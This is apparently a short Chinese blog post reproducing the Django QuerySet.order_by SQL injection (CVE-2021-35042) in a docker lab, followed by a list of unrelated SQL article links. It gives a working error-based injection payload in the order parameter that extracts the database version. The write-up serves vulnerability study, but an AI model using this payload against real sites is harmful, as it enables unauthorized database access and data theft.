漏洞描述
Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。
参考链接:
该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。
漏洞环境及利用
搭建docker环境
payload
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)
blackK_YC2023-11-26 19:09
相关推荐
mahailiang36 分钟前
codeblocks+wxWidgets Projects中引用第三方库(sqlite3)Root_Hacker2 小时前
sql注入学习笔记hamawari3 小时前
SQL语法invicinble4 小时前
对于mysql层对sql层面的知识体系的理解和把握l1t5 小时前
DeepSeek辅助总结postgresql wiki提供的数独求解器万行5 小时前
SQL进阶&索引篇山岚的运维笔记6 小时前
SQL Server笔记 -- 第13章:IF...ELSE创客小邓6 小时前
Qt对SQLite数据库的操作酉鬼女又兒7 小时前
SQL23 统计每个学校各难度的用户平均刷题数